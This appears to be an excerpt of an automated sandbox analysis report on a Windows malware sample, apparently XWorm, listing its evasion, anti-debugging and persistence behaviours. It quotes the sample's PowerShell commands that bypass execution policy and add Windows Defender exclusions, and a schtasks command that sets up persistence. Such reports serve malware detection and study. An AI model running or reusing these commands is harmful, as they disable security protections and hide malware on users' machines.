                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 7512Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exe TID: 8008Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeFile Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeThread delayed: delay time: 922337203685477
                    Source: AntiMalware.exe.0.drBinary or memory string: vmware
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2859205703.000000001C1D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeCode function: 0_2_00007FFD9B7F79E1 CheckRemoteDebuggerPresent,0_2_00007FFD9B7F79E1
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KJhsNv2RcI.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AntiMalware.exe'Jump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe"Jump to behavior
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.000000000341C000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.000000000341C000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.000000000341C000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.000000000341C000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                    Source: KJhsNv2RcI.exe, 00000000.00000002.2822437837.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.000000000341C000.00000004.00000800.00020000.00000000.sdmp, KJhsNv2RcI.exe, 00000000.00000002.2822437837.0000000003438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2b
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeQueries volume information: C:\Users\user\Desktop\KJhsNv2RcI.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\KJhsNv2RcI.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\AntiMalware.exeQueries volume information: C:\Users\user\AppData\Roaming\AntiMalware.exe VolumeInformation
